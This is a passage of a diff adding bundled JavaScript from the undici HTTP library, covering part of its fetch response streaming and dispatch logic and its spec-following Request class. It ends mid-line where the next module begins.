+ if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + const stream = new ReadableStream( + { + async start (controller) { + fetchParams.controller.controller = controller + }, + async pull (controller) { + await pullAlgorithm(controller) + }, + async cancel (reason) { + await cancelAlgorithm(reason) + } + }, + { + highWaterMark: 0, + size () { + return 1 + } + } + ) + + // 17. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. Set response’s body to a new body whose stream is stream. + response.body = { stream } + + // 2. If response is not a network error and request’s cache mode is + // not "no-store", then update response in httpCache for request. + // TODO + + // 3. If includeCredentials is true and the user agent is not configured + // to block cookies for request (see section 7 of [COOKIES]), then run the + // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on + // the value of each header whose name is a byte-case-insensitive match for + // `Set-Cookie` in response’s header list, if any, and request’s current URL. + // TODO + + // 18. If aborted, then: + // TODO + + // 19. Run these steps in parallel: + + // 1. Run these steps, but abort when fetchParams is canceled: + fetchParams.controller.on('terminated', onAborted) + fetchParams.controller.resume = async () => { + // 1. While true + while (true) { + // 1-3. See onData... + + // 4. Set bytes to the result of handling content codings given + // codings and bytes. + let bytes + let isFailure + try { + const { done, value } = await fetchParams.controller.next() + + if (isAborted(fetchParams)) { + break + } + + bytes = done ? undefined : value + } catch (err) { + if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { + // zlib doesn't like empty streams. + bytes = undefined + } else { + bytes = err + + // err may be propagated from the result of calling readablestream.cancel, + // which might not be an error. 
https://github.com/nodejs/undici/issues/2009 + isFailure = true + } + } + + if (bytes === undefined) { + // 2. Otherwise, if the bytes transmission for response’s message + // body is done normally and stream is readable, then close + // stream, finalize response for fetchParams and response, and + // abort these in-parallel steps. + readableStreamClose(fetchParams.controller.controller) + + finalizeResponse(fetchParams, response) + + return + } + + // 5. Increase timingInfo’s decoded body size by bytes’s length. + timingInfo.decodedBodySize += bytes?.byteLength ?? 0 + + // 6. If bytes is failure, then terminate fetchParams’s controller. + if (isFailure) { + fetchParams.controller.terminate(bytes) + return + } + + // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes + // into stream. + fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) + + // 8. If stream is errored, then terminate the ongoing fetch. + if (isErrored(stream)) { + fetchParams.controller.terminate() + return + } + + // 9. If stream doesn’t need more data ask the user agent to suspend + // the ongoing fetch. + if (!fetchParams.controller.controller.desiredSize) { + return + } + } + } + + // 2. If aborted, then: + function onAborted (reason) { + // 2. If fetchParams is aborted, then: + if (isAborted(fetchParams)) { + // 1. Set response’s aborted flag. + response.aborted = true + + // 2. If stream is readable, then error stream with the result of + // deserialize a serialized abort reason given fetchParams’s + // controller’s serialized abort reason and an + // implementation-defined realm. + if (isReadable(stream)) { + fetchParams.controller.controller.error( + fetchParams.controller.serializedAbortReason + ) + } + } else { + // 3. Otherwise, if stream is readable, error stream with a TypeError. + if (isReadable(stream)) { + fetchParams.controller.controller.error(new TypeError('terminated', { + cause: isErrorLike(reason) ? reason : undefined + })) + } + } + + // 4. 
If connection uses HTTP/2, then transmit an RST_STREAM frame. + // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. + fetchParams.controller.connection.destroy() + } + + // 20. Return response. + return response + + async function dispatch ({ body }) { + const url = requestCurrentURL(request) + /** @type {import('../..').Agent} */ + const agent = fetchParams.controller.dispatcher + + return new Promise((resolve, reject) => agent.dispatch( + { + path: url.pathname + url.search, + origin: url.origin, + method: request.method, + body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, + headers: request.headersList.entries, + maxRedirections: 0, + upgrade: request.mode === 'websocket' ? 'websocket' : undefined + }, + { + body: null, + abort: null, + + onConnect (abort) { + // TODO (fix): Do we need connection here? + const { connection } = fetchParams.controller + + if (connection.destroyed) { + abort(new DOMException('The operation was aborted.', 'AbortError')) + } else { + fetchParams.controller.on('terminated', abort) + this.abort = connection.abort = abort + } + }, + + onHeaders (status, headersList, resume, statusText) { + if (status < 200) { + return + } + + let codings = [] + let location = '' + + const headers = new Headers() + + // For H2, the headers are a plain JS object + // We distinguish between them and iterate accordingly + if (Array.isArray(headersList)) { + for (let n = 0; n < headersList.length; n += 2) { + const key = headersList[n + 0].toString('latin1') + const val = headersList[n + 1].toString('latin1') + if (key.toLowerCase() === 'content-encoding') { + // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 + // "All content-coding values are case-insensitive..." 
+ codings = val.toLowerCase().split(',').map((x) => x.trim()) + } else if (key.toLowerCase() === 'location') { + location = val + } + + headers[kHeadersList].append(key, val) + } + } else { + const keys = Object.keys(headersList) + for (const key of keys) { + const val = headersList[key] + if (key.toLowerCase() === 'content-encoding') { + // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 + // "All content-coding values are case-insensitive..." + codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() + } else if (key.toLowerCase() === 'location') { + location = val + } + + headers[kHeadersList].append(key, val) + } + } + + this.body = new Readable({ read: resume }) + + const decoders = [] + + const willFollow = request.redirect === 'follow' && + location && + redirectStatusSet.has(status) + + // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding + if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { + for (const coding of codings) { + // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 + if (coding === 'x-gzip' || coding === 'gzip') { + decoders.push(zlib.createGunzip({ + // Be less strict when decoding compressed responses, since sometimes + // servers send slightly invalid responses that are still accepted + // by common browsers. + // Always using Z_SYNC_FLUSH is what cURL does. + flush: zlib.constants.Z_SYNC_FLUSH, + finishFlush: zlib.constants.Z_SYNC_FLUSH + })) + } else if (coding === 'deflate') { + decoders.push(zlib.createInflate()) + } else if (coding === 'br') { + decoders.push(zlib.createBrotliDecompress()) + } else { + decoders.length = 0 + break + } + } + } + + resolve({ + status, + statusText, + headersList: headers[kHeadersList], + body: decoders.length + ? 
pipeline(this.body, ...decoders, () => { }) + : this.body.on('error', () => {}) + }) + + return true + }, + + onData (chunk) { + if (fetchParams.controller.dump) { + return + } + + // 1. If one or more bytes have been transmitted from response’s + // message body, then: + + // 1. Let bytes be the transmitted bytes. + const bytes = chunk + + // 2. Let codings be the result of extracting header list values + // given `Content-Encoding` and response’s header list. + // See pullAlgorithm. + + // 3. Increase timingInfo’s encoded body size by bytes’s length. + timingInfo.encodedBodySize += bytes.byteLength + + // 4. See pullAlgorithm... + + return this.body.push(bytes) + }, + + onComplete () { + if (this.abort) { + fetchParams.controller.off('terminated', this.abort) + } + + fetchParams.controller.ended = true + + this.body.push(null) + }, + + onError (error) { + if (this.abort) { + fetchParams.controller.off('terminated', this.abort) + } + + this.body?.destroy(error) + + fetchParams.controller.terminate(error) + + reject(error) + }, + + onUpgrade (status, headersList, socket) { + if (status !== 101) { + return + } + + const headers = new Headers() + + for (let n = 0; n < headersList.length; n += 2) { + const key = headersList[n + 0].toString('latin1') + const val = headersList[n + 1].toString('latin1') + + headers[kHeadersList].append(key, val) + } + + resolve({ + status, + statusText: STATUS_CODES[status], + headersList: headers[kHeadersList], + socket + }) + + return true + } + } + )) + } +} + +module.exports = { + fetch, + Fetch, + fetching, + finalizeAndReportTiming +} + + +/***/ }), + +/***/ 8359: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* globals AbortController */ + + + +const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) +const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) +const { FinalizationRegistry } = __nccwpck_require__(6436)() +const util = 
__nccwpck_require__(3983) +const { + isValidHTTPToken, + sameOrigin, + normalizeMethod, + makePolicyContainer, + normalizeMethodRecord +} = __nccwpck_require__(2538) +const { + forbiddenMethodsSet, + corsSafeListedMethodsSet, + referrerPolicy, + requestRedirect, + requestMode, + requestCredentials, + requestCache, + requestDuplex +} = __nccwpck_require__(1037) +const { kEnumerableProperty } = util +const { kHeaders, kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { URLSerializer } = __nccwpck_require__(685) +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) + +let TransformStream = globalThis.TransformStream + +const kAbortController = Symbol('abortController') + +const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { + signal.removeEventListener('abort', abort) +}) + +// https://fetch.spec.whatwg.org/#request-class +class Request { + // https://fetch.spec.whatwg.org/#dom-request + constructor (input, init = {}) { + if (input === kConstruct) { + return + } + + webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) + + input = webidl.converters.RequestInfo(input) + init = webidl.converters.RequestInit(init) + + // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object + this[kRealm] = { + settingsObject: { + baseUrl: getGlobalOrigin(), + get origin () { + return this.baseUrl?.origin + }, + policyContainer: makePolicyContainer() + } + } + + // 1. Let request be null. + let request = null + + // 2. Let fallbackMode be null. + let fallbackMode = null + + // 3. Let baseURL be this’s relevant settings object’s API base URL. + const baseUrl = this[kRealm].settingsObject.baseUrl + + // 4. Let signal be null. 
+ let signal = null + + // 5. If input is a string, then: + if (typeof input === 'string') { + // 1. Let parsedURL be the result of parsing input with baseURL. + // 2. If parsedURL is failure, then throw a TypeError. + let parsedURL + try { + parsedURL = new URL(input, baseUrl) + } catch (err) { + throw new TypeError('Failed to parse URL from ' + input, { cause: err }) + } + + // 3. If parsedURL includes credentials, then throw a TypeError. + if (parsedURL.username || parsedURL.password) { + throw new TypeError( + 'Request cannot be constructed from a URL that includes credentials: ' + + input + ) + } + + // 4. Set request to a new request whose URL is parsedURL. + request = makeRequest({ urlList: [parsedURL] }) + + // 5. Set fallbackMode to "cors". + fallbackMode = 'cors' + } else { + // 6. Otherwise: + + // 7. Assert: input is a Request object. + assert(input instanceof Request) + + // 8. Set request to input’s request. + request = input[kState] + + // 9. Set signal to input’s signal. + signal = input[kSignal] + } + + // 7. Let origin be this’s relevant settings object’s origin. + const origin = this[kRealm].settingsObject.origin + + // 8. Let window be "client". + let window = 'client' + + // 9. If request’s window is an environment settings object and its origin + // is same origin with origin, then set window to request’s window. + if ( + request.window?.constructor?.name === 'EnvironmentSettingsObject' && + sameOrigin(request.window, origin) + ) { + window = request.window + } + + // 10. If init["window"] exists and is non-null, then throw a TypeError. + if (init.window != null) { + throw new TypeError(`'window' option '${window}' must be null`) + } + + // 11. If init["window"] exists, then set window to "no-window". + if ('window' in init) { + window = 'no-window' + } + + // 12. Set request to a new request with the following properties: + request = makeRequest({ + // URL request’s URL. 
+ // undici implementation note: this is set as the first item in request's urlList in makeRequest + // method request’s method. + method: request.method, + // header list A copy of request’s header list. + // undici implementation note: headersList is cloned in makeRequest + headersList: request.headersList, + // unsafe-request flag Set. + unsafeRequest: request.unsafeRequest, + // client This’s relevant settings object. + client: this[kRealm].settingsObject, + // window window. + window, + // priority request’s priority. + priority: request.priority, + // origin request’s origin. The propagation of the origin is only significant for navigation requests + // being handled by a service worker. In this scenario a request can have an origin that is different + // from the current client. + origin: request.origin, + // referrer request’s referrer. + referrer: request.referrer, + // referrer policy request’s referrer policy. + referrerPolicy: request.referrerPolicy, + // mode request’s mode. + mode: request.mode, + // credentials mode request’s credentials mode. + credentials: request.credentials, + // cache mode request’s cache mode. + cache: request.cache, + // redirect mode request’s redirect mode. + redirect: request.redirect, + // integrity metadata request’s integrity metadata. + integrity: request.integrity, + // keepalive request’s keepalive. + keepalive: request.keepalive, + // reload-navigation flag request’s reload-navigation flag. + reloadNavigation: request.reloadNavigation, + // history-navigation flag request’s history-navigation flag. + historyNavigation: request.historyNavigation, + // URL list A clone of request’s URL list. + urlList: [...request.urlList] + }) + + const initHasKey = Object.keys(init).length !== 0 + + // 13. If init is not empty, then: + if (initHasKey) { + // 1. If request’s mode is "navigate", then set it to "same-origin". + if (request.mode === 'navigate') { + request.mode = 'same-origin' + } + + // 2. 
Unset request’s reload-navigation flag. + request.reloadNavigation = false + + // 3. Unset request’s history-navigation flag. + request.historyNavigation = false + + // 4. Set request’s origin to "client". + request.origin = 'client' + + // 5. Set request’s referrer to "client" + request.referrer = 'client' + + // 6. Set request’s referrer policy to the empty string. + request.referrerPolicy = '' + + // 7. Set request’s URL to request’s current URL. + request.url = request.urlList[request.urlList.length - 1] + + // 8. Set request’s URL list to « request’s URL ». + request.urlList = [request.url] + } + + // 14. If init["referrer"] exists, then: + if (init.referrer !== undefined) { + // 1. Let referrer be init["referrer"]. + const referrer = init.referrer + + // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". + if (referrer === '') { + request.referrer = 'no-referrer' + } else { + // 1. Let parsedReferrer be the result of parsing referrer with + // baseURL. + // 2. If parsedReferrer is failure, then throw a TypeError. + let parsedReferrer + try { + parsedReferrer = new URL(referrer, baseUrl) + } catch (err) { + throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) + } + + // 3. If one of the following is true + // - parsedReferrer’s scheme is "about" and path is the string "client" + // - parsedReferrer’s origin is not same origin with origin + // then set request’s referrer to "client". + if ( + (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || + (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) + ) { + request.referrer = 'client' + } else { + // 4. Otherwise, set request’s referrer to parsedReferrer. + request.referrer = parsedReferrer + } + } + } + + // 15. If init["referrerPolicy"] exists, then set request’s referrer policy + // to it. + if (init.referrerPolicy !== undefined) { + request.referrerPolicy = init.referrerPolicy + } + + // 16. 
Let mode be init["mode"] if it exists, and fallbackMode otherwise. + let mode + if (init.mode !== undefined) { + mode = init.mode + } else { + mode = fallbackMode + } + + // 17. If mode is "navigate", then throw a TypeError. + if (mode === 'navigate') { + throw webidl.errors.exception({ + header: 'Request constructor', + message: 'invalid request mode navigate.' + }) + } + + // 18. If mode is non-null, set request’s mode to mode. + if (mode != null) { + request.mode = mode + } + + // 19. If init["credentials"] exists, then set request’s credentials mode + // to it. + if (init.credentials !== undefined) { + request.credentials = init.credentials + } + + // 18. If init["cache"] exists, then set request’s cache mode to it. + if (init.cache !== undefined) { + request.cache = init.cache + } + + // 21. If request’s cache mode is "only-if-cached" and request’s mode is + // not "same-origin", then throw a TypeError. + if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { + throw new TypeError( + "'only-if-cached' can be set only with 'same-origin' mode" + ) + } + + // 22. If init["redirect"] exists, then set request’s redirect mode to it. + if (init.redirect !== undefined) { + request.redirect = init.redirect + } + + // 23. If init["integrity"] exists, then set request’s integrity metadata to it. + if (init.integrity != null) { + request.integrity = String(init.integrity) + } + + // 24. If init["keepalive"] exists, then set request’s keepalive to it. + if (init.keepalive !== undefined) { + request.keepalive = Boolean(init.keepalive) + } + + // 25. If init["method"] exists, then: + if (init.method !== undefined) { + // 1. Let method be init["method"]. + let method = init.method + + // 2. If method is not a method or method is a forbidden method, then + // throw a TypeError. 
+ if (!isValidHTTPToken(method)) { + throw new TypeError(`'${method}' is not a valid HTTP method.`) + } + + if (forbiddenMethodsSet.has(method.toUpperCase())) { + throw new TypeError(`'${method}' HTTP method is unsupported.`) + } + + // 3. Normalize method. + method = normalizeMethodRecord[method] ?? normalizeMethod(method) + + // 4. Set request’s method to method. + request.method = method + } + + // 26. If init["signal"] exists, then set signal to it. + if (init.signal !== undefined) { + signal = init.signal + } + + // 27. Set this’s request to request. + this[kState] = request + + // 28. Set this’s signal to a new AbortSignal object with this’s relevant + // Realm. + // TODO: could this be simplified with AbortSignal.any + // (https://dom.spec.whatwg.org/#dom-abortsignal-any) + const ac = new AbortController() + this[kSignal] = ac.signal + this[kSignal][kRealm] = this[kRealm] + + // 29. If signal is not null, then make this’s signal follow signal. + if (signal != null) { + if ( + !signal || + typeof signal.aborted !== 'boolean' || + typeof signal.addEventListener !== 'function' + ) { + throw new TypeError( + "Failed to construct 'Request': member signal is not of type AbortSignal." + ) + } + + if (signal.aborted) { + ac.abort(signal.reason) + } else { + // Keep a strong ref to ac while request object + // is alive. This is needed to prevent AbortController + // from being prematurely garbage collected. + // See, https://github.com/nodejs/undici/issues/1926. + this[kAbortController] = ac + + const acRef = new WeakRef(ac) + const abort = function () { + const ac = acRef.deref() + if (ac !== undefined) { + ac.abort(this.reason) + } + } + + // Third-party AbortControllers may not work with these. + // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. 
+ try { + // If the max amount of listeners is equal to the default, increase it + // This is only available in node >= v19.9.0 + if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { + setMaxListeners(100, signal) + } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { + setMaxListeners(100, signal) + } + } catch {} + + util.addAbortListener(signal, abort) + requestFinalizer.register(ac, { signal, abort }) + } + } + + // 30. Set this’s headers to a new Headers object with this’s relevant + // Realm, whose header list is request’s header list and guard is + // "request". + this[kHeaders] = new Headers(kConstruct) + this[kHeaders][kHeadersList] = request.headersList + this[kHeaders][kGuard] = 'request' + this[kHeaders][kRealm] = this[kRealm] + + // 31. If this’s request’s mode is "no-cors", then: + if (mode === 'no-cors') { + // 1. If this’s request’s method is not a CORS-safelisted method, + // then throw a TypeError. + if (!corsSafeListedMethodsSet.has(request.method)) { + throw new TypeError( + `'${request.method} is unsupported in no-cors mode.` + ) + } + + // 2. Set this’s headers’s guard to "request-no-cors". + this[kHeaders][kGuard] = 'request-no-cors' + } + + // 32. If init is not empty, then: + if (initHasKey) { + /** @type {HeadersList} */ + const headersList = this[kHeaders][kHeadersList] + // 1. Let headers be a copy of this’s headers and its associated header + // list. + // 2. If init["headers"] exists, then set headers to init["headers"]. + const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) + + // 3. Empty this’s headers’s header list. + headersList.clear() + + // 4. If headers is a Headers object, then for each header in its header + // list, append header’s name/header’s value to this’s headers. 
+ if (headers instanceof HeadersList) { + for (const [key, val] of headers) { + headersList.append(key, val) + } + // Note: Copy the `set-cookie` meta-data. + headersList.cookies = headers.cookies + } else { + // 5. Otherwise, fill this’s headers with headers. + fillHeaders(this[kHeaders], headers) + } + } + + // 33. Let inputBody be input’s request’s body if input is a Request + // object; otherwise null. + const inputBody = input instanceof Request ? input[kState].body : null + + // 34. If either init["body"] exists and is non-null or inputBody is + // non-null, and request’s method is `GET` or `HEAD`, then throw a + // TypeError. + if ( + (init.body != null || inputBody != null) && + (request.method === 'GET' || request.method === 'HEAD') + ) { + throw new TypeError('Request with GET/HEAD method cannot have body.') + } + + // 35. Let initBody be null. + let initBody = null + + // 36. If init["body"] exists and is non-null, then: + if (init.body != null) { + // 1. Let Content-Type be null. + // 2. Set initBody and Content-Type to the result of extracting + // init["body"], with keepalive set to request’s keepalive. + const [extractedBody, contentType] = extractBody( + init.body, + request.keepalive + ) + initBody = extractedBody + + // 3, If Content-Type is non-null and this’s headers’s header list does + // not contain `Content-Type`, then append `Content-Type`/Content-Type to + // this’s headers. + if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { + this[kHeaders].append('content-type', contentType) + } + } + + // 37. Let inputOrInitBody be initBody if it is non-null; otherwise + // inputBody. + const inputOrInitBody = initBody ?? inputBody + + // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is + // null, then: + if (inputOrInitBody != null && inputOrInitBody.source == null) { + // 1. If initBody is non-null and init["duplex"] does not exist, + // then throw a TypeError. 
+ if (initBody != null && init.duplex == null) { + throw new TypeError('RequestInit: duplex option is required when sending a body.') + } + + // 2. If this’s request’s mode is neither "same-origin" nor "cors", + // then throw a TypeError. + if (request.mode !== 'same-origin' && request.mode !== 'cors') { + throw new TypeError( + 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' + ) + } + + // 3. Set this’s request’s use-CORS-preflight flag. + request.useCORSPreflightFlag = true + } + + // 39. Let finalBody be inputOrInitBody. + let finalBody = inputOrInitBody + + // 40. If initBody is null and inputBody is non-null, then: + if (initBody == null && inputBody != null) { + // 1. If input is unusable, then throw a TypeError. + if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { + throw new TypeError( + 'Cannot construct a Request with a Request object that has already been used.' + ) + } + + // 2. Set finalBody to the result of creating a proxy for inputBody. + if (!TransformStream) { + TransformStream = (__nccwpck_require__(5356).TransformStream) + } + + // https://streams.spec.whatwg.org/#readablestream-create-a-proxy + const identityTransform = new TransformStream() + inputBody.stream.pipeThrough(identityTransform) + finalBody = { + source: inputBody.source, + length: inputBody.length, + stream: identityTransform.readable + } + } + + // 41. Set this’s request’s body to finalBody. + this[kState].body = finalBody + } + + // Returns request’s HTTP method, which is "GET" by default. + get method () { + webidl.brandCheck(this, Request) + + // The method getter steps are to return this’s request’s method. + return this[kState].method + } + + // Returns the URL of request as a string. + get url () { + webidl.brandCheck(this, Request) + + // The url getter steps are to return this’s request’s URL, serialized. 
+ return URLSerializer(this[kState].url) + } + + // Returns a Headers object consisting of the headers associated with request. + // Note that headers added in the network layer by the user agent will not + // be accounted for in this object, e.g., the "Host" header. + get headers () { + webidl.brandCheck(this, Request) + + // The headers getter steps are to return this’s headers. + return this[kHeaders] + } + + // Returns the kind of resource requested by request, e.g., "document" + // or "script". + get destination () { + webidl.brandCheck(this, Request) + + // The destination getter are to return this’s request’s destination. + return this[kState].destination + } + + // Returns the referrer of request. Its value can be a same-origin URL if + // explicitly set in init, the empty string to indicate no referrer, and + // "about:client" when defaulting to the global’s default. This is used + // during fetching to determine the value of the `Referer` header of the + // request being made. + get referrer () { + webidl.brandCheck(this, Request) + + // 1. If this’s request’s referrer is "no-referrer", then return the + // empty string. + if (this[kState].referrer === 'no-referrer') { + return '' + } + + // 2. If this’s request’s referrer is "client", then return + // "about:client". + if (this[kState].referrer === 'client') { + return 'about:client' + } + + // Return this’s request’s referrer, serialized. + return this[kState].referrer.toString() + } + + // Returns the referrer policy associated with request. + // This is used during fetching to compute the value of the request’s + // referrer. + get referrerPolicy () { + webidl.brandCheck(this, Request) + + // The referrerPolicy getter steps are to return this’s request’s referrer policy. + return this[kState].referrerPolicy + } + + // Returns the mode associated with request, which is a string indicating + // whether the request will use CORS, or will be restricted to same-origin + // URLs. 
+ get mode () { + webidl.brandCheck(this, Request) + + // The mode getter steps are to return this’s request’s mode. + return this[kState].mode + } + + // Returns the credentials mode associated with request, + // which is a string indicating whether credentials will be sent with the + // request always, never, or only when sent to a same-origin URL. + get credentials () { + // The credentials getter steps are to return this’s request’s credentials mode. + return this[kState].credentials + } + + // Returns the cache mode associated with request, + // which is a string indicating how the request will + // interact with the browser’s cache when fetching. + get cache () { + webidl.brandCheck(this, Request) + + // The cache getter steps are to return this’s request’s cache mode. + return this[kState].cache + } + + // Returns the redirect mode associated with request, + // which is a string indicating how redirects for the + // request will be handled during fetching. A request + // will follow redirects by default. + get redirect () { + webidl.brandCheck(this, Request) + + // The redirect getter steps are to return this’s request’s redirect mode. + return this[kState].redirect + } + + // Returns request’s subresource integrity metadata, which is a + // cryptographic hash of the resource being fetched. Its value + // consists of multiple hashes separated by whitespace. [SRI] + get integrity () { + webidl.brandCheck(this, Request) + + // The integrity getter steps are to return this’s request’s integrity + // metadata. + return this[kState].integrity + } + + // Returns a boolean indicating whether or not request can outlive the + // global in which it was created. + get keepalive () { + webidl.brandCheck(this, Request) + + // The keepalive getter steps are to return this’s request’s keepalive. + return this[kState].keepalive + } + + // Returns a boolean indicating whether or not request is for a reload + // navigation. 
+ get isReloadNavigation () { + webidl.brandCheck(this, Request) + + // The isReloadNavigation getter steps are to return true if this’s + // request’s reload-navigation flag is set; otherwise false. + return this[kState].reloadNavigation + } + + // Returns a boolean indicating whether or not request is for a history + // navigation (a.k.a. back-foward navigation). + get isHistoryNavigation () { + webidl.brandCheck(this, Request) + + // The isHistoryNavigation getter steps are to return true if this’s request’s + // history-navigation flag is set; otherwise false. + return this[kState].historyNavigation + } + + // Returns the signal associated with request, which is an AbortSignal + // object indicating whether or not request has been aborted, and its + // abort event handler. + get signal () { + webidl.brandCheck(this, Request) + + // The signal getter steps are to return this’s signal. + return this[kSignal] + } + + get body () { + webidl.brandCheck(this, Request) + + return this[kState].body ? this[kState].body.stream : null + } + + get bodyUsed () { + webidl.brandCheck(this, Request) + + return !!this[kState].body && util.isDisturbed(this[kState].body.stream) + } + + get duplex () { + webidl.brandCheck(this, Request) + + return 'half' + } + + // Returns a clone of request. + clone () { + webidl.brandCheck(this, Request) + + // 1. If this is unusable, then throw a TypeError. + if (this.bodyUsed || this.body?.locked) { + throw new TypeError('unusable') + } + + // 2. Let clonedRequest be the result of cloning this’s request. + const clonedRequest = cloneRequest(this[kState]) + + // 3. Let clonedRequestObject be the result of creating a Request object, + // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. 
+ const clonedRequestObject = new Request(kConstruct) + clonedRequestObject[kState] = clonedRequest + clonedRequestObject[kRealm] = this[kRealm] + clonedRequestObject[kHeaders] = new Headers(kConstruct) + clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList + clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] + clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] + + // 4. Make clonedRequestObject’s signal follow this’s signal. + const ac = new AbortController() + if (this.signal.aborted) { + ac.abort(this.signal.reason) + } else { + util.addAbortListener( + this.signal, + () => { + ac.abort(this.signal.reason) + } + ) + } + clonedRequestObject[kSignal] = ac.signal + + // 4. Return clonedRequestObject. + return clonedRequestObject + } +} + +mixinBody(Request) + +function makeRequest (init) { + // https://fetch.spec.whatwg.org/#requests + const request = { + method: 'GET', + localURLsOnly: false, + unsafeRequest: false, + body: null, + client: null, + reservedClient: null, + replacesClientId: '', + window: 'client', + keepalive: false, + serviceWorkers: 'all', + initiator: '', + destination: '', + priority: null, + origin: 'client', + policyContainer: 'client', + referrer: 'client', + referrerPolicy: '', + mode: 'no-cors', + useCORSPreflightFlag: false, + credentials: 'same-origin', + useCredentials: false, + cache: 'default', + redirect: 'follow', + integrity: '', + cryptoGraphicsNonceMetadata: '', + parserMetadata: '', + reloadNavigation: false, + historyNavigation: false, + userActivation: false, + taintedOrigin: false, + redirectCount: 0, + responseTainting: 'basic', + preventNoCacheCacheControlHeaderModification: false, + done: false, + timingAllowFailed: false, + ...init, + headersList: init.headersList + ? 
new HeadersList(init.headersList) + : new HeadersList() + } + request.url = request.urlList[0] + return request +} + +// https://fetch.spec.whatwg.org/#concept-request-clone +function cloneRequest (request) { + // To clone a request request, run these steps: + + // 1. Let newRequest be a copy of request, except for its body. + const newRequest = makeRequest({ ...request, body: null }) + + // 2. If request’s body is non-null, set newRequest’s body to the + // result of cloning request’s body. + if (request.body != null) { + newRequest.body = cloneBody(request.body) + } + + // 3. Return newRequest. + return newRequest +} + +Object.defineProperties(Request.prototype, { + method: kEnumerableProperty, + url: kEnumerableProperty, + headers: kEnumerableProperty, + redirect: kEnumerableProperty, + clone: kEnumerableProperty, + signal: kEnumerableProperty, + duplex: kEnumerableProperty, + destination: kEnumerableProperty, + body: kEnumerableProperty, + bodyUsed: kEnumerableProperty, + isHistoryNavigation: kEnumerableProperty, + isReloadNavigation: kEnumerableProperty, + keepalive: kEnumerableProperty, + integrity: kEnumerableProperty, + cache: kEnumerableProperty, + credentials: kEnumerableProperty, + attribute: kEnumerableProperty, + referrerPolicy: kEnumerableProperty, + referrer: kEnumerableProperty, + mode: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'Request', + configurable: true + } +}) + +webidl.converters.Request = webidl.interfaceConverter( + Request +) + +// https://fetch.spec.whatwg.org/#requestinfo +webidl.converters.RequestInfo = function (V) { + if (typeof V === 'string') { + return webidl.converters.USVString(V) + } + + if (V instanceof Request) { + return webidl.converters.Request(V) + } + + return webidl.converters.USVString(V) +} + +webidl.converters.AbortSignal = webidl.interfaceConverter( + AbortSignal +) + +// https://fetch.spec.whatwg.org/#requestinit +webidl.converters.RequestInit = webidl.dictionaryConverter([ + { + key: 'method', + 
converter: webidl.converters.ByteString + }, + { + key: 'headers', + converter: webidl.converters.HeadersInit + }, + { + key: 'body', + converter: webidl.nullableConverter( + webidl.converters.BodyInit + ) + }, + { + key: 'referrer', + converter: webidl.converters.USVString + }, + { + key: 'referrerPolicy', + converter: webidl.converters.DOMString, + // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy + allowedValues: referrerPolicy + }, + { + key: 'mode', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#concept-request-mode + allowedValues: requestMode + }, + { + key: 'credentials', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestcredentials + allowedValues: requestCredentials + }, + { + key: 'cache', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestcache + allowedValues: requestCache + }, + { + key: 'redirect', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestredirect + allowedValues: requestRedirect + }, + { + key: 'integrity', + converter: webidl.converters.DOMString + }, + { + key: 'keepalive', + converter: webidl.converters.boolean + }, + { + key: 'signal', + converter: webidl.nullableConverter( + (signal) => webidl.converters.AbortSignal( + signal, + { strict: false } + ) + ) + }, + { + key: 'window', + converter: webidl.converters.any + }, + { + key: 'duplex', + converter: webidl.converters.DOMString, + allowedValues: requestDuplex + } +]) + +module.exports = { Request, makeRequest } + + +/***/ }), + +/***/ 7823: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Headers, HeadersList, fill } = __nccwpck_require__(554) +const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) +const util = __nccwpck_require__(3983) +const 